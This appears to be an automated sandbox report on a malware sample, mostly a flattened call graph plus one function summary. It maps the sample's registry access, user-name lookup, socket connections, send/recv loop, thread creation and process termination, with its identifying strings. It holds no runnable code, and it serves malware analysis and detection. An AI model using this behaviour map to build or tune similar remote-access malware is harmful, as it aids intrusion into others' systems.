4a8dddc 93209->93210 93211 4ab9adb _Yarn 21 API calls 93210->93211 93212 4a8dded _Yarn 93211->93212 93605 4a862ee 93212->93605 93214 4a8de20 93214->92927 93216 4a820ec 93215->93216 93217 4a823ae 11 API calls 93216->93217 93218 4a82106 93217->93218 93219 4a82549 28 API calls 93218->93219 93220 4a82114 93219->93220 93220->92930 93642 4a820bf 93221->93642 93223 4a81fb8 11 API calls 93224 4a99e3c 93223->93224 93225 4a81fb8 11 API calls 93224->93225 93227 4a99e44 93225->93227 93226 4a99e0c 93648 4a84182 28 API calls 93226->93648 93230 4a81fb8 11 API calls 93227->93230 93232 4a8d43c 93230->93232 93231 4a99e18 93233 4a81fc2 28 API calls 93231->93233 93243 4a8e563 93232->93243 93235 4a99e21 93233->93235 93234 4a81fc2 28 API calls 93236 4a99d9a 93234->93236 93237 4a81fb8 11 API calls 93235->93237 93236->93226 93236->93234 93238 4a81fb8 11 API calls 93236->93238 93242 4a99e0a 93236->93242 93646 4a84182 28 API calls 93236->93646 93647 4a9ab9a 28 API calls 93236->93647 93239 4a99e29 93237->93239 93238->93236 93649 4a9ab9a 28 API calls 93239->93649 93242->93223 93244 4a8e56f 93243->93244 93246 4a8e576 93243->93246 93650 4a82143 11 API calls 93244->93650 93246->92935 93248 4a82143 93247->93248 93252 4a8217f 93248->93252 93651 4a82710 11 API calls 93248->93651 93250 4a82164 93652 4a826f2 11 API calls std::_Deallocate 93250->93652 93252->92937 93254 4a81e4d 93253->93254 93255 4a81e55 93254->93255 93653 4a82138 22 API calls 93254->93653 93255->92942 93259 4a820bf 11 API calls 93258->93259 93260 4a8530a 93259->93260 93654 4a83280 93260->93654 93262 4a85326 93262->92950 93659 4a851cf 93263->93659 93265 4a88217 93663 4a82035 93265->93663 93268 4a81fc2 93269 4a82019 93268->93269 93270 4a81fd1 93268->93270 93277 4a81fb8 93269->93277 93271 4a823ae 11 API calls 93270->93271 93272 4a81fda 93271->93272 93273 4a8201c 93272->93273 93274 4a81ff5 93272->93274 93275 4a8265a 11 API calls 93273->93275 93678 4a83078 28 API calls 93274->93678 93275->93269 93278 4a823ae 11 API calls 93277->93278 93279 4a81fc1 93278->93279 93279->92964 93281 4a81fa9 93280->93281 93282 4a81fb2 93280->93282 93679 4a825c0 28 API calls 93281->93679 93282->92969 93680 4a99f23 93284->93680 93289 4a81fc2 28 API calls 93290 4a992ea 93289->93290 93291 4a81fb8 11 API calls 93290->93291 93292 4a992f2 93291->93292 93293 4a91f91 31 API calls 93292->93293 93295 4a99348 93292->93295 93294 4a9931b 93293->93294 93296 4a99326 StrToIntA 93294->93296 93295->92997 93297 4a9933d 93296->93297 93298 4a99334 93296->93298 93300 4a81fb8 11 API calls 93297->93300 93688 4a9accf 22 API calls 93298->93688 93300->93295 93302 4a92356 93301->93302 93303 4a862ee 28 API calls 93302->93303 93304 4a9236b 93303->93304 93305 4a820d6 28 API calls 93304->93305 93306 4a9237b 93305->93306 93307 4a9215f 14 API calls 93306->93307 93308 4a92385 93307->93308 93309 4a81fb8 11 API calls 93308->93309 93310 4a92392 93309->93310 93310->93099 93312 4a8207b 93311->93312 93313 4a823ae 11 API calls 93312->93313 93314 4a82086 93313->93314 93689 4a824cd 93314->93689 93318 4a92178 93317->93318 93319 4a921af 93317->93319 93322 4a9218a RegSetValueExA RegCloseKey 93318->93322 93320 4a81fb8 11 API calls 93319->93320 93321 4a8da38 93320->93321 93321->93049 93322->93319 93324 4ab9880 _strftime 93323->93324 93693 4ab8bbe 93324->93693 93326 4a8da51 93326->93057 93326->93059 93328 4a9958b 93327->93328 93329 4a994f0 GetLocalTime 93327->93329 93330 4a81fb8 11 API calls 93328->93330 93331 4a852fe 28 API calls 93329->93331 93332 4a99593 93330->93332 93333 4a99532 93331->93333 93334 4a81fb8 11 API calls 93332->93334 93335 4a88209 28 API calls 93333->93335 93336 4a8daa1 93334->93336 93337 4a9953e 93335->93337 93336->93074 93721 4a82ef0 93337->93721 93340 4a88209 28 API calls 93341 4a99556 93340->93341 93726 4a9928b 74 API calls 93341->93726 93343 4a99564 93344 4a81fb8 11 API calls 93343->93344 93345 4a99570 93344->93345 93346 4a81fb8 11 API calls 93345->93346 93347 4a99579 93346->93347 93348 4a81fb8 11 API calls 93347->93348 93349 4a99582 93348->93349 93350 4a81fb8 11 API calls 93349->93350 93350->93328 93741 4a81f66 93351->93741 93353 4a88f36 _wcslen 93354 4a88f49 93353->93354 93355 4a88f60 93353->93355 93356 4a8c5ed 31 API calls 93354->93356 93357 4a8c5ed 31 API calls 93355->93357 93358 4a88f51 93356->93358 93359 4a88f68 93357->93359 93360 4a81ef3 28 API calls 93358->93360 93361 4a81ef3 28 API calls 93359->93361 93362 4a88f5b 93360->93362 93363 4a88f76 93361->93363 93365 4a81ee9 11 API calls 93362->93365 93364 4a81ee9 11 API calls 93363->93364 93366 4a88f7e 93364->93366 93367 4a88fb5 93365->93367 93745 4a881c7 28 API calls 93366->93745 93369 4a88ffb 93367->93369 93370 4a88fdc 93367->93370 93753 4a88098 28 API calls 93369->93753 93374 4a88fe1 93370->93374 93375 4a89013 93370->93375 93371 4a88f90 93746 4a82ff4 93371->93746 93751 4a88098 28 API calls 93374->93751 93378 4a81ee9 11 API calls 93375->93378 93376 4a89009 93754 4a89203 83 API calls 93376->93754 93382 4a8901b 93378->93382 93381 4a81ef3 28 API calls 93384 4a88fa5 93381->93384 93382->93117 93383 4a88fef 93752 4a892ba 29 API calls 93383->93752 93386 4a81ee9 11 API calls 93384->93386 93386->93362 93387 4a88ff9 93387->93375 93389 4a9961b GetUserNameW 93388->93389 93792 4a8415e 93389->93792 93394 4a82ff4 28 API calls 93395 4a9965d 93394->93395 93396 4a81ee9 11 API calls 93395->93396 93397 4a99666 93396->93397 93398 4a81ee9 11 API calls 93397->93398 93399 4a8dca2 93398->93399 93400 4a81ef3 93399->93400 93401 4a81f4a 93400->93401 93402 4a81f02 93400->93402 93409 4a81ee9 93401->93409 93403 4a82232 11 API calls 93402->93403 93404 4a81f0b 93403->93404 93405 4a81f4d 93404->93405 93406 4a81f26 93404->93406 93407 4a82316 11 API calls 93405->93407 93889 4a8303c 28 API calls 93406->93889 93407->93401 93410 4a82232 11 API calls 93409->93410 93411 4a81ef2 93410->93411 93411->93161 93411->93162 93890 4a8533f 28 API calls 93412->93890 93415 4a820bf 11 API calls 93414->93415 93416 4a93994 93415->93416 93891 4a99894 93416->93891 93419 4a820bf 11 API calls 93420 4a939aa 93419->93420 93421 4a81e45 22 API calls 93420->93421 93422 4a939b8 93421->93422 93423 4ab9867 _strftime 39 API calls 93422->93423 93424 4a939c5 93423->93424 93425 4a939ca Sleep 93424->93425 93426 4a939d7 93424->93426 93425->93426 93427 4a82073 28 API calls 93426->93427 93428 4a939e6 93427->93428 93429 4a81e45 22 API calls 93428->93429 93430 4a939ef 93429->93430 93431 4a820d6 28 API calls 93430->93431 93432 4a939fa 93431->93432 93433 4a99d87 28 API calls 93432->93433 93434 4a93a02 93433->93434 93895 4a8487e WSAStartup 93434->93895 93436 4a93a0c 93437 4a81e45 22 API calls 93436->93437 93438 4a93a15 93437->93438 93439 4a81e45 22 API calls 93438->93439 93479 4a93a94 93438->93479 93440 4a93a2e 93439->93440 93441 4a81e45 22 API calls 93440->93441 93442 4a93a3f 93441->93442 93444 4a81e45 22 API calls 93442->93444 93443 4a99d87 28 API calls 93443->93479 93445 4a93a50 93444->93445 93447 4a81e45 22 API calls 93445->93447 93446 4a8822a 28 API calls 93446->93479 93448 4a93a61 93447->93448 93450 4a81e45 22 API calls 93448->93450 93449 4a81fc2 28 API calls 93449->93479 93451 4a93a72 93450->93451 93452 4a81e45 22 API calls 93451->93452 93453 4a93a84 93452->93453 93997 4a8471d 86 API calls 93453->93997 93455 4a82ef0 28 API calls 93455->93479 93456 4a994da 77 API calls 93456->93479 93458 4a93be2 WSAGetLastError 93998 4a9a86b 30 API calls 93458->93998 93461 4a852dd 28 API calls 93461->93479 93463 4a82073 28 API calls 93463->93479 93466 4a852fe 28 API calls 93466->93479 93467 4a81e6d 11 API calls 93467->93479 93468 4a88209 28 API calls 93468->93479 93469 4ab9867 _strftime 39 API calls 93470 4a944bf Sleep 93469->93470 93470->93479 93471 4a81fb8 11 API calls 93471->93479 93475 4a81e45 22 API calls 93475->93479 93476 4a820d6 28 API calls 93476->93479 93478 4a91f91 31 API calls 93478->93479 93479->93443 93479->93446 93479->93449 93479->93455 93479->93456 93479->93458 93479->93461 93479->93463 93479->93466 93479->93467 93479->93468 93479->93469 93479->93471 93479->93475 93479->93476 93479->93478 93502 4a93e11 93479->93502 93896 4a9393f 93479->93896 93901 4a8480d 93479->93901 93908 4a84f31 93479->93908 93923 4a848a8 connect 93479->93923 93983 4a84e06 WaitForSingleObject 93479->93983 93999 4a93013 50 API calls 93479->93999 94000 4a88098 28 API calls 93479->94000 94001 4abf34f 20 API calls 93479->94001 94002 4a920e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 93479->94002 93480 4a8415e 28 API calls 93480->93502 93481 4a81e45 22 API calls 93482 4a93e7b GetTickCount 93481->93482 94003 4a99b16 28 API calls 93482->94003 93485 4a99b16 28 API calls 93485->93502 93488 4a99c8a 28 API calls 93488->93502 93490 4a82e81 28 API calls 93490->93502 93491 4a88209 28 API calls 93491->93502 93493 4a82ef0 28 API calls 93493->93502 93495 4a81fb8 11 API calls 93495->93502 93496 4a81ee9 11 API calls 93496->93502 93499 4a82073 28 API calls 93499->93502 93500 4a994da 77 API calls 93500->93502 93501 4a94461 CreateThread 93501->93502 94034 4a98ccd 101 API calls 93501->94034 93502->93479 93502->93480 93502->93481 93502->93485 93502->93488 93502->93490 93502->93491 93502->93493 93502->93495 93502->93496 93502->93499 93502->93500 93502->93501 94004 4a99ac6 GetTickCount 93502->94004 94005 4a99a77 30 API calls ___scrt_get_show_window_mode 93502->94005 94006 4a8e2bb 29 API calls 93502->94006 94007 4a82f11 28 API calls 93502->94007 94008 4a8826c 28 API calls 93502->94008 94009 4a84a81 60 API calls _Yarn 93502->94009 94010 4a84bf0 110 API calls _Yarn 93502->94010 94011 4a89f9a 82 API calls 93502->94011 93503->92943 93504->92951 93505->92955 93508 4a820bf 11 API calls 93507->93508 93509 4a88236 93508->93509 93510 4a83280 28 API calls 93509->93510 93511 4a88253 93510->93511 93511->92977 93513 4a8d5c5 93512->93513 93514 4a91f5e RegQueryValueExA RegCloseKey 93512->93514 93513->92973 93513->92998 93514->93513 93515->92981 93516->93000 93517->93027 93518->93000 93519->93010 93521 4a81f66 11 API calls 93520->93521 93522 4a8c609 93521->93522 93523 4a8c629 93522->93523 93524 4a8c65e 93522->93524 93528 4a8c61f 93522->93528 94035 4a9959f 29 API calls 93523->94035 93527 4a99f23 GetCurrentProcess 93524->93527 93526 4a8c752 GetLongPathNameW 93530 4a8415e 28 API calls 93526->93530 93531 4a8c663 93527->93531 93528->93526 93529 4a8c632 93532 4a81ef3 28 API calls 93529->93532 93533 4a8c767 93530->93533 93534 4a8c6b9 93531->93534 93535 4a8c667 93531->93535 93537 4a8c63c 93532->93537 93538 4a8415e 28 API calls 93533->93538 93539 4a8415e 28 API calls 93534->93539 93536 4a8415e 28 API calls 93535->93536 93541 4a8c675 93536->93541 93543 4a81ee9 11 API calls 93537->93543 93542 4a8c776 93538->93542 93540 4a8c6c7 93539->93540 93547 4a8415e 28 API calls 93540->93547 93548 4a8415e 28 API calls 93541->93548 94038 4a8c7f9 28 API calls 93542->94038 93543->93528 93545 4a8c789 94039 4a82f85 28 API calls 93545->94039 93550 4a8c6dd 93547->93550 93551 4a8c68b 93548->93551 93549 4a8c794 94040 4a82f85 28 API calls 93549->94040 94037 4a82f85 28 API calls 93550->94037 94036 4a82f85 28 API calls 93551->94036 93555 4a8c79e 93558 4a81ee9 11 API calls 93555->93558 93556 4a8c6e8 93559 4a81ef3 28 API calls 93556->93559 93557 4a8c696 93560 4a81ef3 28 API calls 93557->93560 93561 4a8c7a8 93558->93561 93562 4a8c6f3 93559->93562 93563 4a8c6a1 93560->93563 93564 4a81ee9 11 API calls 93561->93564 93565 4a81ee9 11 API calls 93562->93565 93566 4a81ee9 11 API calls 93563->93566 93567 4a8c7b1 93564->93567 93568 4a8c6fc 93565->93568 93569 4a8c6aa 93566->93569 93570 4a81ee9 11 API calls 93567->93570 93571 4a81ee9 11 API calls 93568->93571 93572 4a81ee9 11 API calls 93569->93572 93573 4a8c7ba 93570->93573 93571->93537 93572->93537 93574 4a81ee9 11 API calls 93573->93574 93575 4a8c7c3 93574->93575 93576 4a81ee9 11 API calls 93575->93576 93577 4a8c7cc 93576->93577 93577->93088 93578->93100 93579->93114 93580->93118 93581->93030 93582->93065 93583->93124 93584->93133 93585->93157 93586->93145 93587->93004 93590 4a994b0 LoadResource LockResource SizeofResource 93589->93590 93591 4a8dd9e 93589->93591 93590->93591 93592 4ab9adb 93591->93592 93597 4ac3649 __Getctype 93592->93597 93593 4ac3687 93609 4abad91 20 API calls __dosmaperr 93593->93609 93594 4ac3672 RtlAllocateHeap 93596 4ac3685 93594->93596 93594->93597 93596->93204 93597->93593 93597->93594 93608 4ac0480 7 API calls 2 library calls 93597->93608 93600 4a8209f 93599->93600 93610 4a823ae 93600->93610 93602 4a820aa 93614 4a824ea 93602->93614 93604 4a820b9 93604->93207 93606 4a82097 28 API calls 93605->93606 93607 4a86302 93606->93607 93607->93214 93608->93597 93609->93596 93611 4a82408 93610->93611 93612 4a823b8 93610->93612 93611->93602 93612->93611 93621 4a82787 11 API calls std::_Deallocate 93612->93621 93615 4a824fa 93614->93615 93616 4a82500 93615->93616 93617 4a82515 93615->93617 93622 4a82549 93616->93622 93632 4a828c8 28 API calls 93617->93632 93620 4a82513 93620->93604 93621->93611 93633 4a82868 93622->93633 93624 4a8255d 93625 4a82572 93624->93625 93626 4a82587 93624->93626 93638 4a82a14 22 API calls 93625->93638 93640 4a828c8 28 API calls 93626->93640 93629 4a8257b 93639 4a829ba 22 API calls 93629->93639 93631 4a82585 93631->93620 93632->93620 93634 4a82870 93633->93634 93635 4a82878 93634->93635 93641 4a82c83 22 API calls 93634->93641 93635->93624 93638->93629 93639->93631 93640->93631 93643 4a820c7 93642->93643 93644 4a823ae 11 API calls 93643->93644 93645 4a820d2 93644->93645 93645->93236 93646->93236 93647->93236 93648->93231 93649->93242 93650->93246 93651->93250 93652->93252 93655 4a8328a 93654->93655 93657 4a832a9 93655->93657 93658 4a828c8 28 API calls 93655->93658 93657->93262 93658->93657 93660 4a851db 93659->93660 93669 4a85254 93660->93669 93662 4a851e8 93662->93265 93664 4a82041 93663->93664 93665 4a823ae 11 API calls 93664->93665 93666 4a8205b 93665->93666 93674 4a8265a 93666->93674 93670 4a85262 93669->93670 93673 4a82884 22 API calls 93670->93673 93675 4a8266b 93674->93675 93676 4a823ae 11 API calls 93675->93676 93677 4a8206d 93676->93677 93677->93268 93678->93269 93679->93282 93681 4a992bc 93680->93681 93682 4a99f30 GetCurrentProcess 93680->93682 93683 4a91f91 RegOpenKeyExA 93681->93683 93682->93681 93684 4a91fbf RegQueryValueExA RegCloseKey 93683->93684 93685 4a91fe9 93683->93685 93684->93685 93686 4a82073 28 API calls 93685->93686 93687 4a91ffe 93686->93687 93687->93289 93688->93297 93690 4a824d9 93689->93690 93691 4a824ea 28 API calls 93690->93691 93692 4a82091 93691->93692 93692->93044 93709 4ab97c5 93693->93709 93695 4ab8c0b 93715 4ab8557 35 API calls 2 library calls 93695->93715 93696 4ab8bd0 93696->93695 93697 4ab8be5 93696->93697 93708 4ab8bea pre_c_initialization 93696->93708 93714 4abad91 20 API calls __dosmaperr 93697->93714 93701 4ab8c17 93702 4ab8c46 93701->93702 93716 4ab980a 39 API calls __Tolower 93701->93716 93705 4ab8cb2 93702->93705 93717 4ab9771 20 API calls 2 library calls 93702->93717 93718 4ab9771 20 API calls 2 library calls 93705->93718 93706 4ab8d79 _strftime 93706->93708 93719 4abad91 20 API calls __dosmaperr 93706->93719 93708->93326 93710 4ab97ca 93709->93710 93711 4ab97dd 93709->93711 93720 4abad91 20 API calls __dosmaperr 93710->93720 93711->93696 93713 4ab97cf pre_c_initialization 93713->93696 93714->93708 93715->93701 93716->93701 93717->93705 93718->93706 93719->93708 93720->93713 93727 4a81f90 93721->93727 93723 4a82efe 93724 4a82035 11 API calls 93723->93724 93725 4a82f0d 93724->93725 93725->93340 93726->93343 93730 4a825d0 93727->93730 93729 4a81f9d 93729->93723 93731 4a82868 22 API calls 93730->93731 93732 4a825e2 93731->93732 93733 4a82609 93732->93733 93734 4a82652 93732->93734 93738 4a8261b 93733->93738 93739 4a828c8 28 API calls 93733->93739 93740 4a82884 22 API calls 93734->93740 93738->93729 93739->93738 93742 4a81f6e 93741->93742 93755 4a82232 93742->93755 93744 4a81f79 93744->93353 93745->93371 93760 4a83202 93746->93760 93748 4a83002 93764 4a83242 93748->93764 93751->93383 93752->93387 93788 4a892fb 157 API calls 93752->93788 93753->93376 93754->93375 93789 4a892ef 82 API calls 93754->93789 93790 4a89311 48 API calls 93754->93790 93791 4a89305 122 API calls 93754->93791 93756 4a8228c 93755->93756 93757 4a8223c 93755->93757 93756->93744 93757->93756 93759 4a82759 11 API calls std::_Deallocate 93757->93759 93759->93756 93761 4a8320e 93760->93761 93770 4a835f8 93761->93770 93763 4a8321b 93763->93748 93765 4a8324e 93764->93765 93766 4a82232 11 API calls 93765->93766 93767 4a83268 93766->93767 93784 4a82316 93767->93784 93771 4a83606 93770->93771 93772 4a8360c 93771->93772 93773 4a83624 93771->93773 93781 4a83686 28 API calls 93772->93781 93775 4a8363c 93773->93775 93776 4a8367e 93773->93776 93780 4a83622 93775->93780 93782 4a827c6 28 API calls 93775->93782 93783 4a82884 22 API calls 93776->93783 93780->93763 93781->93780 93782->93780 93785 4a82327 93784->93785 93786 4a82232 11 API calls 93785->93786 93787 4a823a7 93786->93787 93787->93381 93793 4a84166 93792->93793 93794 4a82232 11 API calls 93793->93794 93795 4a84171 93794->93795 93803 4a8419c 93795->93803 93798 4a842dc 93816 4a84333 93798->93816 93800 4a842ea 93801 4a83242 11 API calls 93800->93801 93802 4a842f9 93801->93802 93802->93394 93804 4a841a8 93803->93804 93807 4a841b9 93804->93807 93806 4a8417c 93806->93798 93808 4a841c9 93807->93808 93809 4a841cf 93808->93809 93810 4a841e6 93808->93810 93814 4a84247 28 API calls 93809->93814 93815 4a827c6 28 API calls 93810->93815 93813 4a841e4 93813->93806 93814->93813 93815->93813 93817 4a8433f 93816->93817 93820 4a84351 93817->93820 93819 4a8434d 93819->93800 93821 4a8435f 93820->93821 93822 4a8437e 93821->93822 93823 4a84365 93821->93823 93824 4a82868 22 API calls 93822->93824 93886 4a834c6 28 API calls 93823->93886 93825 4a84386 93824->93825 93827 4a843f9 93825->93827 93828 4a8439f 93825->93828 93888 4a82884 22 API calls 93827->93888 93839 4a8437c 93828->93839 93887 4a827c6 28 API calls 93828->93887 93839->93819 93886->93839 93887->93839 93889->93401 93894 4a998da _Yarn ___scrt_get_show_window_mode 93891->93894 93892 4a82073 28 API calls 93893 4a9399f 93892->93893 93893->93419 93894->93892 93895->93436 93897 4a93958 getaddrinfo WSASetLastError 93896->93897 93898 4a9394e 93896->93898 93897->93479 94012 4a937dc 29 API calls ___std_exception_copy 93898->94012 93900 4a93953 93900->93897 93902 4a84819 93901->93902 93903 4a84826 socket 93901->93903 94013 4a8487e WSAStartup 93902->94013 93905 4a84840 CreateEventW 93903->93905 93906 4a84822 93903->93906 93905->93479 93906->93479 93907 4a8481e 93907->93903 93907->93906 93909 4a84fca 93908->93909 93910 4a84f45 93908->93910 93909->93479 93911 4a84f4e 93910->93911 93912 4a84fa0 CreateEventA CreateThread 93910->93912 93913 4a84f5d GetLocalTime 93910->93913 93911->93912 93912->93909 94015 4a85130 93912->94015 94014 4a99b16 28 API calls 93913->94014 93915 4a84f71 93916 4a852dd 28 API calls 93915->93916 93917 4a84f81 93916->93917 93918 4a82073 28 API calls 93917->93918 93919 4a84f90 93918->93919 93920 4a994da 77 API calls 93919->93920 93921 4a84f95 93920->93921 93922 4a81fb8 11 API calls 93921->93922 93922->93912 93924 4a849fb 93923->93924 93925 4a848ce 93923->93925 93926 4a84a01 WSAGetLastError 93924->93926 93927 4a8495e 93924->93927 93925->93927 93928 4a84903 93925->93928 93930 4a852fe 28 API calls 93925->93930 93926->93927 93929 4a84a11 93926->93929 93927->93479 94019 4a9ea15 27 API calls 93928->94019 93931 4a84912 93929->93931 93932 4a84a16 93929->93932 93934 4a848ef 93930->93934 93937 4a82073 28 API calls 93931->93937 94030 4a9a86b 30 API calls 93932->94030 93938 4a82073 28 API calls 93934->93938 93936 4a8490b 93936->93931 93940 4a84921 93936->93940 93941 4a84a60 93937->93941 93942 4a848fe 93938->93942 93939 4a84a20 93943 4a852dd 28 API calls 93939->93943 93949 4a84930 93940->93949 93950 4a84967 93940->93950 93944 4a82073 28 API calls 93941->93944 93945 4a994da 77 API calls 93942->93945 93946 4a84a30 93943->93946 93947 4a84a6f 93944->93947 93945->93928 93948 4a82073 28 API calls 93946->93948 93951 4a994da 77 API calls 93947->93951 93952 4a84a3f 93948->93952 93954 4a82073 28 API calls 93949->93954 94027 4a9f7f5 53 API calls 93950->94027 93951->93927 93956 4a994da 77 API calls 93952->93956 93955 4a8493f 93954->93955 93958 4a82073 28 API calls 93955->93958 93959 4a84a44 93956->93959 93957 4a8496f 93960 4a849a4 93957->93960 93961 4a84974 93957->93961 93962 4a8494e 93958->93962 93964 4a81fb8 11 API calls 93959->93964 94029 4a9ebbb 28 API calls 93960->94029 93965 4a82073 28 API calls 93961->93965 93966 4a994da 77 API calls 93962->93966 93964->93927 93968 4a84983 93965->93968 93980 4a84953 93966->93980 93967 4a849ac 93969 4a849d9 CreateEventW CreateEventW 93967->93969 93971 4a82073 28 API calls 93967->93971 93970 4a82073 28 API calls 93968->93970 93969->93927 93972 4a84992 93970->93972 93975 4a849c2 93971->93975 93973 4a994da 77 API calls 93972->93973 93976 4a84997 93973->93976 93977 4a82073 28 API calls 93975->93977 94028 4a9ee67 51 API calls 93976->94028 93979 4a849d1 93977->93979 93981 4a994da 77 API calls 93979->93981 94020 4a9ea55 93980->94020 93982 4a849d6 93981->93982 93982->93969 93984 4a84e20 SetEvent CloseHandle 93983->93984 93985 4a84e37 closesocket 93983->93985 93986 4a84eb8 93984->93986 93987 4a84e44 93985->93987 93986->93479 93988 4a84e5a 93987->93988 93989 4a84e53 93987->93989 93991 4a84e6c WaitForSingleObject 93988->93991 93992 4a84eae SetEvent CloseHandle 93988->93992 94033 4a850c4 81 API calls 93989->94033 93993 4a9ea55 3 API calls 93991->93993 93992->93986 93994 4a84e7b SetEvent WaitForSingleObject 93993->93994 93995 4a9ea55 3 API calls 93994->93995 93996 4a84e93 SetEvent CloseHandle CloseHandle 93995->93996 93996->93992 93997->93479 93998->93479 93999->93479 94000->93479 94001->93479 94002->93479 94003->93502 94004->93502 94005->93502 94006->93502 94007->93502 94008->93502 94009->93502 94010->93502 94011->93502 94012->93900 94013->93907 94014->93915 94018 4a8513c 99 API calls 94015->94018 94017 4a85139 94018->94017 94019->93936 94021 4a9ea5d 94020->94021 94022 4a9c4c6 94020->94022 94021->93927 94023 4a9c4d4 94022->94023 94031 4a9b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94022->94031 94032 4a9c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 94023->94032 94026 4a9c4db 94027->93957 94028->93980 94029->93967 94030->93939 94031->94023 94032->94026 94033->93988 94035->93529 94036->93557 94037->93556 94038->93545 94039->93549 94040->93555 94043 4a8e1a8 94041->94043 94042 4a91f34 3 API calls 94042->94043 94043->94042 94044 4a8e1da 94043->94044 94045 4a8e24e 94043->94045 94047 4a8e23e Sleep 94043->94047 94044->94047 94056 4a81ee9 11 API calls 94044->94056 94060 4a82073 28 API calls 94044->94060 94063 4a9215f 14 API calls 94044->94063 94074 4a8bc59 110 API calls ___scrt_get_show_window_mode 94044->94074 94075 4a88098 28 API calls 94044->94075 94076 4a99bca 28 API calls 94044->94076 94077 4a92204 14 API calls 94044->94077 94078 4a88098 28 API calls 94045->94078 94047->94043 94051 4a8e25b 94079 4a99bca 28 API calls 94051->94079 94053 4a8e267 94080 4a92204 14 API calls 94053->94080 94056->94044 94057 4a8e27a 94058 4a81ee9 11 API calls 94057->94058 94059 4a8e286 94058->94059 94061 4a82073 28 API calls 94059->94061 94060->94044 94062 4a8e297 94061->94062 94064 4a9215f 14 API calls 94062->94064 94063->94044 94065 4a8e2aa 94064->94065 94081 4a912b5 TerminateProcess WaitForSingleObject 94065->94081 94067 4a8e2b2 ExitProcess 94082 4a91253 61 API calls 94073->94082 94075->94044 94076->94044 94077->94044 94078->94051 94079->94053 94080->94057 94081->94067 94083 4aad6a2 94084 4aad6ad 94083->94084 94085 4aad6c1 94084->94085 94087 4ab0ca3 94084->94087 94088 4ab0cae 94087->94088 94089 4ab0cb2 94087->94089 94088->94085 94091 4abb6c1 94089->94091 94092 4ac3697 94091->94092 94093 4ac36af 94092->94093 94094 4ac36a4 94092->94094 94096 4ac36b7 94093->94096 94102 4ac36c0 __Getctype 94093->94102 94104 4ac3649 94094->94104 94111 4ac3c92 20 API calls _free 94096->94111 94098 4ac36ea HeapReAlloc 94101 4ac36ac 94098->94101 94098->94102 94099 4ac36c5 94112 4abad91 20 API calls __dosmaperr 94099->94112 94101->94088 94102->94098 94102->94099 94113 4ac0480 7 API calls 2 library calls 94102->94113 94105 4ac3687 94104->94105 94109 4ac3657 __Getctype 94104->94109 94115 4abad91 20 API calls __dosmaperr 94105->94115 94106 4ac3672 RtlAllocateHeap 94108 4ac3685 94106->94108 94106->94109 94108->94101 94109->94105 94109->94106 94114 4ac0480 7 API calls 2 library calls 94109->94114 94111->94101 94112->94101 94113->94102 94114->94109 94115->94108 94116 4aa4a00 94121 4aa4a7d send 94116->94121 94122 4aa4991 94128 4aa4a66 recv 94122->94128 94129 4a9bd72 94130 4a9bd87 _Yarn ___scrt_get_show_window_mode 94129->94130 94131 4a9bf8a 94130->94131 94148 4ab0c79 21 API calls _Yarn 94130->94148 94137 4a9bf3e 94131->94137 94143 4a9b917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 94131->94143 94134 4a9bf9b 94134->94137 94144 4ab0c79 21 API calls _Yarn 94134->94144 94136 4a9bf37 ___scrt_get_show_window_mode 94136->94137 94149 4ab0c79 21 API calls _Yarn 94136->94149 94139 4a9bfd4 ___scrt_get_show_window_mode 94139->94137 94145 4ab12ff 94139->94145 94141 4a9bf64 ___scrt_get_show_window_mode 94141->94137 94150 4ab0c79 21 API calls _Yarn 94141->94150 94143->94134 94144->94139 94151 4ab121e 94145->94151 94147 4ab1307 94147->94137 94148->94136 94149->94141 94150->94131 94152 4ab1237 94151->94152 94156 4ab122d 94151->94156 94152->94156 94157 4ab0c79 21 API calls _Yarn 94152->94157 94154 4ab1258 94154->94156 94158 4ab15ec CryptAcquireContextA 94154->94158 94156->94147 94157->94154 94159 4ab1608 94158->94159 94160 4ab160d CryptGenRandom 94158->94160 94159->94156 94160->94159 94161 4ab1622 CryptReleaseContext 94160->94161 94161->94159

                                        Executed Functions

                                        Function 04A8E18D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 04A91F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 04A91F54
                                          • Part of subcall function 04A91F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,04AF2200), ref: 04A91F72
                                          • Part of subcall function 04A91F34: RegCloseKey.KERNEL32(?), ref: 04A91F7D
                                        • Sleep.KERNEL32(00000BB8), ref: 04A8E243
                                        • ExitProcess.KERNEL32 ref: 04A8E2B4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                        • String ID: 3.8.0 Pro$override$pth_unenc
                                        • API String ID: 2281282204-3177840460
                                        • Opcode ID: 74b911757481e017683ddcfef21c541a7d2134e28fa03d4700656ad8bc4471f6
                                        • Instruction ID: 91b3df9108f4b7dc1ba5cbe047ff625fc3f700b18bdad1bf401bb4129ffd126b
                                        • Opcode Fuzzy Hash: 74b911757481e017683ddcfef21c541a7d2134e28fa03d4700656ad8bc4471f6
                                        • Instruction Fuzzy Hash: 1221E571B503007BFE08B7B98E16B7F35D9EB95608F40044CE5119B2C5EE66BE068392
                                        Function 068D1117 Relevance: 4.9, APIs: 3, Instructions: 366memorylibraryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
